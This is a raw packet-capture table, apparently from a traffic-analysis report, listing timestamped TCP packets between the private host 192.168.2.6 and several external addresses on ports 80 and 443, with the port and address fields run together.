                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.910170078 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.910202980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.911164999 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.911269903 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.911331892 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.912257910 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.912295103 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.912359953 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.913324118 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.913372993 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.913414001 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.914393902 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.914438009 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.914470911 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.915473938 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.915556908 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.915590048 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.916569948 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.916626930 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.916656971 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.917632103 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.917694092 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.917732954 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.918701887 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.918762922 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.918796062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.919783115 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.919843912 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.919867039 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.920859098 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.920905113 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.920949936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.921941996 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.921993017 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.922065973 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.923017025 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.923052073 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.923127890 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.924110889 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.924158096 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.924181938 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.925167084 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.925216913 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.925266027 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.926239967 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.926284075 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.926340103 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.927306890 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.927347898 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.927385092 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.928397894 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.928442001 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.928495884 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.929493904 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.929542065 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.929600000 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.930557013 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.930630922 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.930653095 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.931613922 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.931705952 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.931736946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.932687044 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.932738066 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.932790041 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.933759928 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.933805943 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.933837891 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.934849024 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.934897900 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.934954882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.935946941 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.936028004 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.936034918 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.936984062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.937094927 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.937140942 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.938070059 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.938132048 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.938174009 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.939147949 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.939192057 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.939519882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.940232038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.940282106 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.940305948 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.941314936 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.941365957 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.941411972 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.942394972 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.942446947 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.942490101 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.943483114 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.943530083 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.943592072 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.944530010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.944566965 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.944590092 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.945557117 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.945642948 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:34.004053116 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:36.374636889 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:36.374689102 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:36.374762058 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:36.375679970 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:36.375693083 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.698348999 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.698442936 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.702985048 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.702996969 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.703237057 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.704802036 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.704875946 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.704883099 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.705013990 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:38.751334906 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302182913 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302273035 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302331924 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302490950 CET49789443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:39.302515030 CET4434978920.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.864680052 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.864717007 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.864809990 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.867547035 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:46.867562056 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.077198029 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.077399969 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.079272985 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.079283953 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.079525948 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.101902962 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.102066994 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.102072954 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.102215052 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.147325993 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.763416052 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.763537884 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.763762951 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.764751911 CET49817443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:49.764765978 CET4434981720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:56.244899988 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:56.244930029 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:56.245161057 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:56.245764017 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:56.245779037 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:57.225743055 CET8049704217.20.58.101192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:57.225886106 CET4970480192.168.2.6217.20.58.101
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:57.225950003 CET4970480192.168.2.6217.20.58.101
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:57.345524073 CET8049704217.20.58.101192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.589188099 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.589242935 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.590884924 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.590893984 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.591133118 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.592441082 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.592513084 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.592518091 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.592593908 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:58.639334917 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:59.306736946 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:59.306883097 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:59.306950092 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:59.307002068 CET49837443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:59.307019949 CET4434983720.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:21.798382998 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:21.798414946 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:21.798615932 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:21.799273968 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:21.799289942 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.118341923 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.118412971 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.120299101 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.120315075 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.120573997 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.122488976 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.122838020 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.122844934 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.122965097 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.163337946 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.793093920 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.793186903 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.793256998 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.793462992 CET49892443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:24.793495893 CET4434989220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:26.289069891 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:26.289125919 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:26.289197922 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:26.289799929 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:26.289814949 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.709743023 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.709821939 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.712100983 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.712121964 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.712389946 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.715135098 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.715189934 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.715197086 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.715357065 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:28.759372950 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:29.270245075 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:29.270338058 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:29.270605087 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:29.270785093 CET49902443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:29.270807981 CET4434990220.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.384365082 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.384433031 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.384506941 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.397078037 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.397118092 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.807782888 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.807874918 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.872282028 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.872302055 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.872663975 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.872724056 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.876168966 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:33.919349909 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360342026 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360362053 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360394955 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360419035 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360441923 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360466957 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.360495090 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.363564968 CET49915443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.363590956 CET44349915149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.505491972 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.505531073 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.505820990 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.506127119 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.506145000 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.519927979 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.520003080 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.523778915 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.523787022 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.524058104 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.524373055 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.524782896 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:36.567344904 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.213116884 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.213190079 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.213193893 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.213383913 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.216073036 CET49921443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.216089964 CET44349921188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.217993021 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.218039989 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.218269110 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.218780994 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:37.218792915 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:38.712454081 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:38.712538958 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:38.712975979 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:38.712986946 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:38.714687109 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:38.714694977 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619056940 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619122028 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619138002 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619149923 CET44349927188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619183064 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619204998 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619380951 CET49927443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:39.619393110 CET44349927188.245.216.205192.168.2.6
